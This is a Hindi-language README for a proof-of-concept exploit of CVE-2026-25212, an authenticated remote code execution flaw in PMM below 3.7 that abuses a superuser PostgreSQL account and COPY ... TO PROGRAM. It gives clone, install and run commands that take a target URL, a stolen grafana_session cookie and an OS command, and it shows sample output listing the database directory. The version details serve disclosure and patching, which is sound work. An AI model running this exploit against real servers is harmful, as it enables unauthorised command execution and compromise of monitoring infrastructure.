
CVE-2026-25212 के लिए POC
गंभीर – CVSS 9.9 – PMM < 3.7 में प्रमाणित दूरस्थ कोड निष्पादन
यह प्रमाण-अवधारणा एक कमजोरी का शोषण करती है जहाँ PMM में एक आंतरिक PostgreSQL उपयोगकर्ता 'SUPERUSER' विशेषाधिकार बनाए रखता है। एक प्रमाणित हमलावर ('pmm-admin' अधिकारों के साथ) 'डेटा स्रोत जोड़ें' सुविधा का दुरुपयोग कर सकता है और PostgreSQL के 'COPY ... TO PROGRAM' का उपयोग करके मनमाना OS कमांड निष्पादित कर सकता है।
प्रभावित संस्करण: PMM < 3.7
स्थिर संस्करण: PMM 3.7 (और बाद में)
requests (pip install requests)git clone https://github.com/5170Temp/CVE-2026-25212
cd CVE-2026-25212
pip install requests
COOKIE_VALUE आपका grafana_session कुकी मान है जैसे 3131e17e1653ee4eeceb703fac45c717
python3 poc.py -t https://pmm.example.com --cookie "COOKIE_VALUE" -c "id"
उदाहरण आउटपुट:
[+] UID: krfbxa-Dk
base
global
pg_commit_ts
pg_dynshmem
pg_hba.conf
pg_ident.conf
pg_logical
pg_multixact
pg_notify
pg_replslot
pg_serial
pg_snapshots
pg_stat
pg_stat_tmp
pg_subtrans
pg_tblspc
pg_twophase
PG_VERSION
pg_wal
pg_xact
postgresql.auto.conf
postgresql.conf
postmaster.opts
postmaster.pid
[+] Done